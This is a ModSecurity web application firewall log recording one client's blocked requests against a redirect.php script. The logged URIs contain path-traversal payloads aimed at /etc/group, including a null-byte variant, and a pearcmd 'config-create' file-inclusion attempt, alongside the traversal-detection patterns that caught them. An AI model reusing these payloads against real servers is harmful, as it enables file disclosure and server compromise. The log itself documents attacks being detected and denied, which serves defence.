[Tue May 12 05:06:13.012628 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd&+config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SQAAAVA"]
[Tue May 12 05:06:13.012701 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd& config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SQAAAVA"]
[Tue May 12 05:06:13.012742 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd& config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SQAAAVA"]
[Tue May 12 05:06:13.020442 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SQAAAVA"]
[Tue May 12 05:06:13.020779 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SQAAAVA"]
[Tue May 12 05:06:13.116066 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SwAAAVA"]
[Tue May 12 05:06:13.116667 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SwAAAVA"]
[Tue May 12 05:06:13.116942 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68SwAAAVA"]
[Tue May 12 05:06:13.212264 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TAAAAVA"]
[Tue May 12 05:06:13.212327 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TAAAAVA"]
[Tue May 12 05:06:13.212537 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TAAAAVA"]
[Tue May 12 05:06:13.213110 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TAAAAVA"]
[Tue May 12 05:06:13.213389 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TAAAAVA"]
[Tue May 12 05:06:13.308880 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TQAAAVA"]
[Tue May 12 05:06:13.308975 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TQAAAVA"]
[Tue May 12 05:06:13.309019 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TQAAAVA"]
[Tue May 12 05:06:13.309073 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TQAAAVA"]
[Tue May 12 05:06:13.309667 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TQAAAVA"]
[Tue May 12 05:06:13.309942 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TQAAAVA"]
[Tue May 12 05:06:13.405387 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.405440 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.405635 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.405677 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.405714 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.405749 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.405808 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.406454 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.406724 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68TwAAAVA"]
[Tue May 12 05:06:13.502292 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UAAAAVA"]
[Tue May 12 05:06:13.502357 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UAAAAVA"]
[Tue May 12 05:06:13.502388 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UAAAAVA"]
[Tue May 12 05:06:13.502447 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UAAAAVA"]
[Tue May 12 05:06:13.503044 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UAAAAVA"]
[Tue May 12 05:06:13.503298 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UAAAAVA"]
